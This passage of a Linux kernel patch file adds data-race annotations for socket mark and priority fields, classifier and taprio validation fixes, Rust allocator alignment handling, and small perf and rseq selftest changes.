+ 					       tp->reordering);
+ 		}
+ 	}
+-	tm->tcpm_stamp = jiffies;
++	WRITE_ONCE(tm->tcpm_stamp, jiffies);
+ out_unlock:
+ 	rcu_read_unlock();
+ }
+@@ -539,8 +559,6 @@ bool tcp_peer_is_proven(struct request_sock *req, struct dst_entry *dst)
+ 	return ret;
+ }
+ 
+-static DEFINE_SEQLOCK(fastopen_seqlock);
+-
+ void tcp_fastopen_cache_get(struct sock *sk, u16 *mss,
+ 			    struct tcp_fastopen_cookie *cookie)
+ {
+@@ -647,7 +665,7 @@ static int tcp_metrics_fill_info(struct sk_buff *msg,
+ 	}
+ 
+ 	if (nla_put_msecs(msg, TCP_METRICS_ATTR_AGE,
+-			  jiffies - tm->tcpm_stamp,
++			  jiffies - READ_ONCE(tm->tcpm_stamp),
+ 			  TCP_METRICS_ATTR_PAD) < 0)
+ 		goto nla_put_failure;
+ 
+@@ -658,7 +676,7 @@ static int tcp_metrics_fill_info(struct sk_buff *msg,
+ 		if (!nest)
+ 			goto nla_put_failure;
+ 		for (i = 0; i < TCP_METRIC_MAX_KERNEL + 1; i++) {
+-			u32 val = tm->tcpm_vals[i];
++			u32 val = tcp_metric_get(tm, i);
+ 
+ 			if (!val)
+ 				continue;
+diff --git a/net/ipv6/ip6mr.c b/net/ipv6/ip6mr.c
+index facdc78a43e5c..27fb5479988af 100644
+--- a/net/ipv6/ip6mr.c
++++ b/net/ipv6/ip6mr.c
+@@ -1073,7 +1073,7 @@ static int ip6mr_cache_report(const struct mr_table *mrt, struct sk_buff *pkt,
+ 		   And all this only to mangle msg->im6_msgtype and
+ 		   to set msg->im6_mbz to "mbz" :-)
+ 		 */
+-		skb_push(skb, -skb_network_offset(pkt));
++		__skb_pull(skb, skb_network_offset(pkt));
+ 
+ 		skb_push(skb, sizeof(*msg));
+ 		skb_reset_transport_header(skb);
+diff --git a/net/ipv6/ping.c b/net/ipv6/ping.c
+index 4651aaf70db4f..4d5a27dd9a4b2 100644
+--- a/net/ipv6/ping.c
++++ b/net/ipv6/ping.c
+@@ -120,7 +120,7 @@ static int ping_v6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 	ipcm6_init_sk(&ipc6, np);
+ 	ipc6.sockc.tsflags = sk->sk_tsflags;
+-	ipc6.sockc.mark = sk->sk_mark;
++	ipc6.sockc.mark = READ_ONCE(sk->sk_mark);
+ 
+ 	fl6.flowi6_oif = oif;
+ 
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 33852fc38ad91..df3abd9e5237c 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -612,7 +612,7 @@ static int rawv6_send_hdrinc(struct sock *sk, struct msghdr *msg, int length,
+ 	skb_reserve(skb, hlen);
+ 
+ 	skb->protocol = htons(ETH_P_IPV6);
+-	skb->priority = sk->sk_priority;
++	skb->priority = READ_ONCE(sk->sk_priority);
+ 	skb->mark = sockc->mark;
+ 	skb->tstamp = sockc->transmit_time;
+ 
+@@ -772,12 +772,12 @@ static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	 */
+ 	memset(&fl6, 0, sizeof(fl6));
+ 
+-	fl6.flowi6_mark = sk->sk_mark;
++	fl6.flowi6_mark = READ_ONCE(sk->sk_mark);
+ 	fl6.flowi6_uid = sk->sk_uid;
+ 
+ 	ipcm6_init(&ipc6);
+ 	ipc6.sockc.tsflags = sk->sk_tsflags;
+-	ipc6.sockc.mark = sk->sk_mark;
++	ipc6.sockc.mark = fl6.flowi6_mark;
+ 
+ 	if (sin6) {
+ 		if (addr_len < SIN6_LEN_RFC2133)
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 0b060cb8681f0..960ab43a49c46 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -2952,7 +2952,8 @@ void ip6_sk_update_pmtu(struct sk_buff *skb, struct sock *sk, __be32 mtu)
+ 	if (!oif && skb->dev)
+ 		oif = l3mdev_master_ifindex(skb->dev);
+ 
+-	ip6_update_pmtu(skb, sock_net(sk), mtu, oif, sk->sk_mark, sk->sk_uid);
++	ip6_update_pmtu(skb, sock_net(sk), mtu, oif, READ_ONCE(sk->sk_mark),
++			sk->sk_uid);
+ 
+ 	dst = __sk_dst_get(sk);
+ 	if (!dst || !dst->obsolete ||
+@@ -3173,8 +3174,8 @@ void ip6_redirect_no_header(struct sk_buff *skb, struct net *net, int oif)
+ 
+ void ip6_sk_redirect(struct sk_buff *skb, struct sock *sk)
+ {
+-	ip6_redirect(skb, sock_net(sk), sk->sk_bound_dev_if, sk->sk_mark,
+-		     sk->sk_uid);
++	ip6_redirect(skb, sock_net(sk), sk->sk_bound_dev_if,
++		     READ_ONCE(sk->sk_mark), sk->sk_uid);
+ }
+ EXPORT_SYMBOL_GPL(ip6_sk_redirect);
+ 
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index d9253aa764fae..4bdd356bb5c46 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -567,8 +567,8 @@ static int tcp_v6_send_synack(const struct sock *sk, struct dst_entry *dst,
+ 		opt = ireq->ipv6_opt;
+ 		if (!opt)
+ 			opt = rcu_dereference(np->opt);
+-		err = ip6_xmit(sk, skb, fl6, skb->mark ? : sk->sk_mark, opt,
+-			       tclass, sk->sk_priority);
++		err = ip6_xmit(sk, skb, fl6, skb->mark ? : READ_ONCE(sk->sk_mark),
++			       opt, tclass, sk->sk_priority);
+ 		rcu_read_unlock();
+ 		err = net_xmit_eval(err);
+ 	}
+@@ -943,7 +943,7 @@ static void tcp_v6_send_response(const struct sock *sk, struct sk_buff *skb, u32
+ 		if (sk->sk_state == TCP_TIME_WAIT)
+ 			mark = inet_twsk(sk)->tw_mark;
+ 		else
+-			mark = sk->sk_mark;
++			mark = READ_ONCE(sk->sk_mark);
+ 		skb_set_delivery_time(buff, tcp_transmit_time(sk), true);
+ 	}
+ 	if (txhash) {
+@@ -1132,7 +1132,8 @@ static void tcp_v6_reqsk_send_ack(const struct sock *sk, struct sk_buff *skb,
+ 			tcp_time_stamp_raw() + tcp_rsk(req)->ts_off,
+ 			READ_ONCE(req->ts_recent), sk->sk_bound_dev_if,
+ 			tcp_v6_md5_do_lookup(sk, &ipv6_hdr(skb)->saddr, l3index),
+-			ipv6_get_dsfield(ipv6_hdr(skb)), 0, sk->sk_priority,
++			ipv6_get_dsfield(ipv6_hdr(skb)), 0,
++			READ_ONCE(sk->sk_priority),
+ 			READ_ONCE(tcp_rsk(req)->txhash));
+ }
+ 
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 04f1d696503cd..27348172b25b9 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -622,7 +622,7 @@ int __udp6_lib_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	if (type == NDISC_REDIRECT) {
+ 		if (tunnel) {
+ 			ip6_redirect(skb, sock_net(sk), inet6_iif(skb),
+-				     sk->sk_mark, sk->sk_uid);
++				     READ_ONCE(sk->sk_mark), sk->sk_uid);
+ 		} else {
+ 			ip6_sk_redirect(skb, sk);
+ 		}
+@@ -1350,7 +1350,7 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	ipcm6_init(&ipc6);
+ 	ipc6.gso_size = READ_ONCE(up->gso_size);
+ 	ipc6.sockc.tsflags = sk->sk_tsflags;
+-	ipc6.sockc.mark = sk->sk_mark;
++	ipc6.sockc.mark = READ_ONCE(sk->sk_mark);
+ 
+ 	/* destination address check */
+ 	if (sin6) {
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 5137ea1861ce2..bce4132b0a5c8 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -519,7 +519,7 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	/* Get and verify the address */
+ 	memset(&fl6, 0, sizeof(fl6));
+ 
+-	fl6.flowi6_mark = sk->sk_mark;
++	fl6.flowi6_mark = READ_ONCE(sk->sk_mark);
+ 	fl6.flowi6_uid = sk->sk_uid;
+ 
+ 	ipcm6_init(&ipc6);
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index 696ba398d699a..937bd4c556151 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -102,7 +102,7 @@ static void mptcp_sol_socket_sync_intval(struct mptcp_sock *msk, int optname, in
+ 			break;
+ 		case SO_MARK:
+ 			if (READ_ONCE(ssk->sk_mark) != sk->sk_mark) {
+-				ssk->sk_mark = sk->sk_mark;
++				WRITE_ONCE(ssk->sk_mark, sk->sk_mark);
+ 				sk_dst_reset(ssk);
+ 			}
+ 			break;
+diff --git a/net/netfilter/nft_socket.c b/net/netfilter/nft_socket.c
+index 49a5348a6a14f..777561b71fcbd 100644
+--- a/net/netfilter/nft_socket.c
++++ b/net/netfilter/nft_socket.c
+@@ -107,7 +107,7 @@ static void nft_socket_eval(const struct nft_expr *expr,
+ 		break;
+ 	case NFT_SOCKET_MARK:
+ 		if (sk_fullsock(sk)) {
+-			*dest = sk->sk_mark;
++			*dest = READ_ONCE(sk->sk_mark);
+ 		} else {
+ 			regs->verdict.code = NFT_BREAK;
+ 			return;
+diff --git a/net/netfilter/xt_socket.c b/net/netfilter/xt_socket.c
+index 7013f55f05d1e..76e01f292aaff 100644
+--- a/net/netfilter/xt_socket.c
++++ b/net/netfilter/xt_socket.c
+@@ -77,7 +77,7 @@ socket_match(const struct sk_buff *skb, struct xt_action_param *par,
+ 
+ 		if (info->flags & XT_SOCKET_RESTORESKMARK && !wildcard &&
+ 		    transparent && sk_fullsock(sk))
+-			pskb->mark = sk->sk_mark;
++			pskb->mark = READ_ONCE(sk->sk_mark);
+ 
+ 		if (sk != skb->sk)
+ 			sock_gen_put(sk);
+@@ -138,7 +138,7 @@ socket_mt6_v1_v2_v3(const struct sk_buff *skb, struct xt_action_param *par)
+ 
+ 		if (info->flags & XT_SOCKET_RESTORESKMARK && !wildcard &&
+ 		    transparent && sk_fullsock(sk))
+-			pskb->mark = sk->sk_mark;
++			pskb->mark = READ_ONCE(sk->sk_mark);
+ 
+ 		if (sk != skb->sk)
+ 			sock_gen_put(sk);
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 6ab9d5b543387..1681068400733 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -2052,8 +2052,8 @@ retry:
+ 
+ 	skb->protocol = proto;
+ 	skb->dev = dev;
+-	skb->priority = sk->sk_priority;
+-	skb->mark = sk->sk_mark;
++	skb->priority = READ_ONCE(sk->sk_priority);
++	skb->mark = READ_ONCE(sk->sk_mark);
+ 	skb->tstamp = sockc.transmit_time;
+ 
+ 	skb_setup_tx_timestamp(skb, sockc.tsflags);
+@@ -2575,8 +2575,8 @@ static int tpacket_fill_skb(struct packet_sock *po, struct sk_buff *skb,
+ 
+ 	skb->protocol = proto;
+ 	skb->dev = dev;
+-	skb->priority = po->sk.sk_priority;
+-	skb->mark = po->sk.sk_mark;
++	skb->priority = READ_ONCE(po->sk.sk_priority);
++	skb->mark = READ_ONCE(po->sk.sk_mark);
+ 	skb->tstamp = sockc->transmit_time;
+ 	skb_setup_tx_timestamp(skb, sockc->tsflags);
+ 	skb_zcopy_set_nouarg(skb, ph.raw);
+@@ -2978,7 +2978,7 @@ static int packet_snd(struct socket *sock, struct msghdr *msg, size_t len)
+ 		goto out_unlock;
+ 
+ 	sockcm_init(&sockc, sk);
+-	sockc.mark = sk->sk_mark;
++	sockc.mark = READ_ONCE(sk->sk_mark);
+ 	if (msg->msg_controllen) {
+ 		err = sock_cmsg_send(sk, msg, &sockc);
+ 		if (unlikely(err))
+@@ -3052,7 +3052,7 @@ static int packet_snd(struct socket *sock, struct msghdr *msg, size_t len)
+ 
+ 	skb->protocol = proto;
+ 	skb->dev = dev;
+-	skb->priority = sk->sk_priority;
++	skb->priority = READ_ONCE(sk->sk_priority);
+ 	skb->mark = sockc.mark;
+ 	skb->tstamp = sockc.transmit_time;
+ 
+diff --git a/net/sched/cls_fw.c b/net/sched/cls_fw.c
+index 1212b057b129c..6160ef7d646ac 100644
+--- a/net/sched/cls_fw.c
++++ b/net/sched/cls_fw.c
+@@ -265,7 +265,6 @@ static int fw_change(struct net *net, struct sk_buff *in_skb,
+ 			return -ENOBUFS;
+ 
+ 		fnew->id = f->id;
+-		fnew->res = f->res;
+ 		fnew->ifindex = f->ifindex;
+ 		fnew->tp = f->tp;
+ 
+diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
+index 9e43b929d4ca4..306188bf2d1ff 100644
+--- a/net/sched/cls_route.c
++++ b/net/sched/cls_route.c
+@@ -511,7 +511,6 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
+ 	if (fold) {
+ 		f->id = fold->id;
+ 		f->iif = fold->iif;
+-		f->res = fold->res;
+ 		f->handle = fold->handle;
+ 
+ 		f->tp = fold->tp;
+diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
+index 1280736a7b92e..ba93e2a6bdbb4 100644
+--- a/net/sched/cls_u32.c
++++ b/net/sched/cls_u32.c
+@@ -824,7 +824,6 @@ static struct tc_u_knode *u32_init_knode(struct net *net, struct tcf_proto *tp,
+ 
+ 	new->ifindex = n->ifindex;
+ 	new->fshift = n->fshift;
+-	new->res = n->res;
+ 	new->flags = n->flags;
+ 	RCU_INIT_POINTER(new->ht_down, ht);
+ 
+@@ -1022,18 +1021,62 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
+ 		return -EINVAL;
+ 	}
+ 
++	/* At this point, we need to derive the new handle that will be used to
++	 * uniquely map the identity of this table match entry. The
++	 * identity of the entry that we need to construct is 32 bits made of:
++	 *     htid(12b):bucketid(8b):node/entryid(12b)
++	 *
++	 * At this point _we have the table(ht)_ in which we will insert this
++	 * entry. We carry the table's id in variable "htid".
++	 * Note that earlier code picked the ht selection either by a) the user
++	 * providing the htid specified via TCA_U32_HASH attribute or b) when
++	 * no such attribute is passed then the root ht, is default to at ID
++	 * 0x[800][00][000]. Rule: the root table has a single bucket with ID 0.
++	 * If OTOH the user passed us the htid, they may also pass a bucketid of
++	 * choice. 0 is fine. For example a user htid is 0x[600][01][000] it is
++	 * indicating hash bucketid of 1. Rule: the entry/node ID _cannot_ be
++	 * passed via the htid, so even if it was non-zero it will be ignored.
++	 *
++	 * We may also have a handle, if the user passed one. The handle also
++	 * carries the same addressing of htid(12b):bucketid(8b):node/entryid(12b).
++	 * Rule: the bucketid on the handle is ignored even if one was passed;
++	 * rather the value on "htid" is always assumed to be the bucketid.
++	 */
+ 	if (handle) {
++		/* Rule: The htid from handle and tableid from htid must match */
+ 		if (TC_U32_HTID(handle) && TC_U32_HTID(handle ^ htid)) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Handle specified hash table address mismatch");
+ 			return -EINVAL;
+ 		}
+-		handle = htid | TC_U32_NODE(handle);
+-		err = idr_alloc_u32(&ht->handle_idr, NULL, &handle, handle,
+-				    GFP_KERNEL);
+-		if (err)
+-			return err;
+-	} else
++		/* Ok, so far we have a valid htid(12b):bucketid(8b) but we
++		 * need to finalize the table entry identification with the last
++		 * part - the node/entryid(12b)). Rule: Nodeid _cannot be 0_ for
++		 * entries. Rule: nodeid of 0 is reserved only for tables(see
++		 * earlier code which processes TC_U32_DIVISOR attribute).
++		 * Rule: The nodeid can only be derived from the handle (and not
++		 * htid).
++		 * Rule: if the handle specified zero for the node id example
++		 * 0x60000000, then pick a new nodeid from the pool of IDs
++		 * this hash table has been allocating from.
++		 * If OTOH it is specified (i.e for example the user passed a
++		 * handle such as 0x60000123), then we use it generate our final
++		 * handle which is used to uniquely identify the match entry.
++		 */
++		if (!TC_U32_NODE(handle)) {
++			handle = gen_new_kid(ht, htid);
++		} else {
++			handle = htid | TC_U32_NODE(handle);
++			err = idr_alloc_u32(&ht->handle_idr, NULL, &handle,
++					    handle, GFP_KERNEL);
++			if (err)
++				return err;
++		}
++	} else {
++		/* The user did not give us a handle; lets just generate one
++		 * from the table's pool of nodeids.
++		 */
+ 		handle = gen_new_kid(ht, htid);
++	}
+ 
+ 	if (tb[TCA_U32_SEL] == NULL) {
+ 		NL_SET_ERR_MSG_MOD(extack, "Selector not specified");
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index a274a9332f333..8d5eebb2dd1b1 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -769,6 +769,11 @@ static const struct nla_policy taprio_tc_policy[TCA_TAPRIO_TC_ENTRY_MAX + 1] = {
+ 	[TCA_TAPRIO_TC_ENTRY_MAX_SDU]	   = { .type = NLA_U32 },
+ };
+ 
++static struct netlink_range_validation_signed taprio_cycle_time_range = {
++	.min = 0,
++	.max = INT_MAX,
++};
++
+ static const struct nla_policy taprio_policy[TCA_TAPRIO_ATTR_MAX + 1] = {
+ 	[TCA_TAPRIO_ATTR_PRIOMAP]	       = {
+ 		.len = sizeof(struct tc_mqprio_qopt)
+@@ -777,7 +782,8 @@ static const struct nla_policy taprio_policy[TCA_TAPRIO_ATTR_MAX + 1] = {
+ 	[TCA_TAPRIO_ATTR_SCHED_BASE_TIME]            = { .type = NLA_S64 },
+ 	[TCA_TAPRIO_ATTR_SCHED_SINGLE_ENTRY]         = { .type = NLA_NESTED },
+ 	[TCA_TAPRIO_ATTR_SCHED_CLOCKID]              = { .type = NLA_S32 },
+-	[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME]           = { .type = NLA_S64 },
++	[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME]           =
++		NLA_POLICY_FULL_RANGE_SIGNED(NLA_S64, &taprio_cycle_time_range),
+ 	[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME_EXTENSION] = { .type = NLA_S64 },
+ 	[TCA_TAPRIO_ATTR_FLAGS]                      = { .type = NLA_U32 },
+ 	[TCA_TAPRIO_ATTR_TXTIME_DELAY]		     = { .type = NLA_U32 },
+@@ -913,6 +919,11 @@ static int parse_taprio_schedule(struct taprio_sched *q, struct nlattr **tb,
+ 			return -EINVAL;
+ 		}
+ 
++		if (cycle < 0 || cycle > INT_MAX) {
++			NL_SET_ERR_MSG(extack, "'cycle_time' is too big");
++			return -EINVAL;
++		}
++
+ 		new->cycle_time = cycle;
+ 	}
+ 
+@@ -1110,7 +1121,7 @@ static void setup_txtime(struct taprio_sched *q,
+ 			 struct sched_gate_list *sched, ktime_t base)
+ {
+ 	struct sched_entry *entry;
+-	u32 interval = 0;
++	u64 interval = 0;
+ 
+ 	list_for_each_entry(entry, &sched->entries, list) {
+ 		entry->next_txtime = ktime_add_ns(base, interval);
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 02d1daae77397..5ae0a54a823b5 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -447,7 +447,7 @@ static void smc_copy_sock_settings(struct sock *nsk, struct sock *osk,
+ 	nsk->sk_rcvbuf = osk->sk_rcvbuf;
+ 	nsk->sk_sndtimeo = osk->sk_sndtimeo;
+ 	nsk->sk_rcvtimeo = osk->sk_rcvtimeo;
+-	nsk->sk_mark = osk->sk_mark;
++	nsk->sk_mark = READ_ONCE(osk->sk_mark);
+ 	nsk->sk_priority = osk->sk_priority;
+ 	nsk->sk_rcvlowat = osk->sk_rcvlowat;
+ 	nsk->sk_bound_dev_if = osk->sk_bound_dev_if;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 5b19b6c53a2cb..78fa620a63981 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -779,7 +779,7 @@ static int unix_set_peek_off(struct sock *sk, int val)
+ 	if (mutex_lock_interruptible(&u->iolock))
+ 		return -EINTR;
+ 
+-	sk->sk_peek_off = val;
++	WRITE_ONCE(sk->sk_peek_off, val);
+ 	mutex_unlock(&u->iolock);
+ 
+ 	return 0;
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index efe9283e98935..e5c1510c098fd 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -643,7 +643,7 @@ static int cfg80211_parse_colocated_ap(const struct cfg80211_bss_ies *ies,
+ 
+ 	ret = cfg80211_calc_short_ssid(ies, &ssid_elem, &s_ssid_tmp);
+ 	if (ret)
+-		return ret;
++		return 0;
+ 
+ 	/* RNR IE may contain more than one NEIGHBOR_AP_INFO */
+ 	while (pos + sizeof(*ap_info) <= end) {
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 371d269d22fa0..22bf10ffbf2d1 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -504,7 +504,7 @@ static struct sk_buff *xsk_build_skb(struct xdp_sock *xs,
+ 
+ 	skb->dev = dev;
+ 	skb->priority = xs->sk.sk_priority;
+-	skb->mark = xs->sk.sk_mark;
++	skb->mark = READ_ONCE(xs->sk.sk_mark);
+ 	skb_shinfo(skb)->destructor_arg = (void *)(long)desc->addr;
+ 	skb->destructor = xsk_destruct_skb;
+ 
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index 7b1b93584bdbe..e65de78cb61bf 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -2174,7 +2174,7 @@ static struct xfrm_policy *xfrm_sk_policy_lookup(const struct sock *sk, int dir,
+ 
+ 		match = xfrm_selector_match(&pol->selector, fl, family);
+ 		if (match) {
+-			if ((sk->sk_mark & pol->mark.m) != pol->mark.v ||
++			if ((READ_ONCE(sk->sk_mark) & pol->mark.m) != pol->mark.v ||
+ 			    pol->if_id != if_id) {
+ 				pol = NULL;
+ 				goto out;
+diff --git a/rust/bindings/bindings_helper.h b/rust/bindings/bindings_helper.h
+index c48bc284214ab..fdb4e11df3bd3 100644
+--- a/rust/bindings/bindings_helper.h
++++ b/rust/bindings/bindings_helper.h
+@@ -9,5 +9,6 @@
+ #include <linux/slab.h>
+ 
+ /* `bindgen` gets confused at certain things. */
++const size_t BINDINGS_ARCH_SLAB_MINALIGN = ARCH_SLAB_MINALIGN;
+ const gfp_t BINDINGS_GFP_KERNEL = GFP_KERNEL;
+ const gfp_t BINDINGS___GFP_ZERO = __GFP_ZERO;
+diff --git a/rust/kernel/allocator.rs b/rust/kernel/allocator.rs
+index 397a3dd57a9b1..9363b527be664 100644
+--- a/rust/kernel/allocator.rs
++++ b/rust/kernel/allocator.rs
+@@ -9,6 +9,36 @@ use crate::bindings;
+ 
+ struct KernelAllocator;
+ 
++/// Calls `krealloc` with a proper size to alloc a new object aligned to `new_layout`'s alignment.
++///
++/// # Safety
++///
++/// - `ptr` can be either null or a pointer which has been allocated by this allocator.
++/// - `new_layout` must have a non-zero size.
++unsafe fn krealloc_aligned(ptr: *mut u8, new_layout: Layout, flags: bindings::gfp_t) -> *mut u8 {
++    // Customized layouts from `Layout::from_size_align()` can have size < align, so pad first.
++    let layout = new_layout.pad_to_align();
++
++    let mut size = layout.size();
++
++    if layout.align() > bindings::BINDINGS_ARCH_SLAB_MINALIGN {
++        // The alignment requirement exceeds the slab guarantee, thus try to enlarge the size
++        // to use the "power-of-two" size/alignment guarantee (see comments in `kmalloc()` for
++        // more information).
++        //
++        // Note that `layout.size()` (after padding) is guaranteed to be a multiple of
++        // `layout.align()`, so `next_power_of_two` gives enough alignment guarantee.
++        size = size.next_power_of_two();
++    }
++
++    // SAFETY:
++    // - `ptr` is either null or a pointer returned from a previous `k{re}alloc()` by the
++    //   function safety requirement.
++    // - `size` is greater than 0 since it's either a `layout.size()` (which cannot be zero
++    //    according to the function safety requirement) or a result from `next_power_of_two()`.
++    unsafe { bindings::krealloc(ptr as *const core::ffi::c_void, size, flags) as *mut u8 }
++}
++
+ unsafe impl GlobalAlloc for KernelAllocator {
+     unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
+         // `krealloc()` is used instead of `kmalloc()` because the latter is
+@@ -30,10 +60,20 @@ static ALLOCATOR: KernelAllocator = KernelAllocator;
+ // to extract the object file that has them from the archive. For the moment,
+ // let's generate them ourselves instead.
+ //
++// Note: Although these are *safe* functions, they are called by the compiler
++// with parameters that obey the same `GlobalAlloc` function safety
++// requirements: size and align should form a valid layout, and size is
++// greater than 0.
++//
+ // Note that `#[no_mangle]` implies exported too, nowadays.
+ #[no_mangle]
+-fn __rust_alloc(size: usize, _align: usize) -> *mut u8 {
+-    unsafe { bindings::krealloc(core::ptr::null(), size, bindings::GFP_KERNEL) as *mut u8 }
++fn __rust_alloc(size: usize, align: usize) -> *mut u8 {
++    // SAFETY: See assumption above.
++    let layout = unsafe { Layout::from_size_align_unchecked(size, align) };
++
++    // SAFETY: `ptr::null_mut()` is null, per assumption above the size of `layout` is greater
++    // than 0.
++    unsafe { krealloc_aligned(ptr::null_mut(), layout, bindings::GFP_KERNEL) }
+ }
+ 
+ #[no_mangle]
+@@ -42,23 +82,27 @@ fn __rust_dealloc(ptr: *mut u8, _size: usize, _align: usize) {
+ }
+ 
+ #[no_mangle]
+-fn __rust_realloc(ptr: *mut u8, _old_size: usize, _align: usize, new_size: usize) -> *mut u8 {
+-    unsafe {
+-        bindings::krealloc(
+-            ptr as *const core::ffi::c_void,
+-            new_size,
+-            bindings::GFP_KERNEL,
+-        ) as *mut u8
+-    }
++fn __rust_realloc(ptr: *mut u8, _old_size: usize, align: usize, new_size: usize) -> *mut u8 {
++    // SAFETY: See assumption above.
++    let new_layout = unsafe { Layout::from_size_align_unchecked(new_size, align) };
++
++    // SAFETY: Per assumption above, `ptr` is allocated by `__rust_*` before, and the size of
++    // `new_layout` is greater than 0.
++    unsafe { krealloc_aligned(ptr, new_layout, bindings::GFP_KERNEL) }
+ }
+ 
+ #[no_mangle]
+-fn __rust_alloc_zeroed(size: usize, _align: usize) -> *mut u8 {
++fn __rust_alloc_zeroed(size: usize, align: usize) -> *mut u8 {
++    // SAFETY: See assumption above.
++    let layout = unsafe { Layout::from_size_align_unchecked(size, align) };
++
++    // SAFETY: `ptr::null_mut()` is null, per assumption above the size of `layout` is greater
++    // than 0.
+     unsafe {
+-        bindings::krealloc(
+-            core::ptr::null(),
+-            size,
++        krealloc_aligned(
++            ptr::null_mut(),
++            layout,
+             bindings::GFP_KERNEL | bindings::__GFP_ZERO,
+-        ) as *mut u8
++        )
+     }
+ }
+diff --git a/tools/perf/tests/shell/test_uprobe_from_different_cu.sh b/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
+index 00d2e0e2e0c28..319f36ebb9a40 100644
+--- a/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
++++ b/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
+@@ -4,6 +4,12 @@
+ 
+ set -e
+ 
++# skip if there's no gcc
++if ! [ -x "$(command -v gcc)" ]; then
++        echo "failed: no gcc compiler"
++        exit 2
++fi
++
+ temp_dir=$(mktemp -d /tmp/perf-uprobe-different-cu-sh.XXXXXXXXXX)
+ 
+ cleanup()
+@@ -11,7 +17,7 @@ cleanup()
+ 	trap - EXIT TERM INT
+ 	if [[ "${temp_dir}" =~ ^/tmp/perf-uprobe-different-cu-sh.*$ ]]; then
+ 		echo "--- Cleaning up ---"
+-		perf probe -x ${temp_dir}/testfile -d foo
++		perf probe -x ${temp_dir}/testfile -d foo || true
+ 		rm -f "${temp_dir}/"*
+ 		rmdir "${temp_dir}"
+ 	fi
+diff --git a/tools/testing/selftests/rseq/rseq.c b/tools/testing/selftests/rseq/rseq.c
+index 4177f9507bbee..b736a5169aad0 100644
+--- a/tools/testing/selftests/rseq/rseq.c
++++ b/tools/testing/selftests/rseq/rseq.c
+@@ -32,9 +32,17 @@
+ #include "../kselftest.h"
+ #include "rseq.h"
+ 
+-static const ptrdiff_t *libc_rseq_offset_p;
+-static const unsigned int *libc_rseq_size_p;
+-static const unsigned int *libc_rseq_flags_p;
++/*
++ * Define weak versions to play nice with binaries that are statically linked
++ * against a libc that doesn't support registering its own rseq.
++ */
++__weak ptrdiff_t __rseq_offset;
++__weak unsigned int __rseq_size;
++__weak unsigned int __rseq_flags;
++
++static const ptrdiff_t *libc_rseq_offset_p = &__rseq_offset;
++static const unsigned int *libc_rseq_size_p = &__rseq_size;
++static const unsigned int *libc_rseq_flags_p = &__rseq_flags;
+ 
+ /* Offset from the thread pointer to the rseq area.  */
+ ptrdiff_t rseq_offset;
+@@ -108,9 +116,17 @@ int rseq_unregister_current_thread(void)
+ static __attribute__((constructor))
+ void rseq_init(void)
+ {
+-	libc_rseq_offset_p = dlsym(RTLD_NEXT, "__rseq_offset");
+-	libc_rseq_size_p = dlsym(RTLD_NEXT, "__rseq_size");
+-	libc_rseq_flags_p = dlsym(RTLD_NEXT, "__rseq_flags");
++	/*
++	 * If the libc's registered rseq size isn't already valid, it may be
++	 * because the binary is dynamically linked and not necessarily due to
++	 * libc not having registered a restartable sequence.  Try to find the
++	 * symbols if that's the case.
++	 */
++	if (!*libc_rseq_size_p) {
++		libc_rseq_offset_p = dlsym(RTLD_NEXT, "__rseq_offset");
++		libc_rseq_size_p = dlsym(RTLD_NEXT, "__rseq_size");
++		libc_rseq_flags_p = dlsym(RTLD_NEXT, "__rseq_flags");
++	}
+ 	if (libc_rseq_size_p && libc_rseq_offset_p && libc_rseq_flags_p &&
+ 			*libc_rseq_size_p != 0) {
+ 		/* rseq registration owned by glibc */
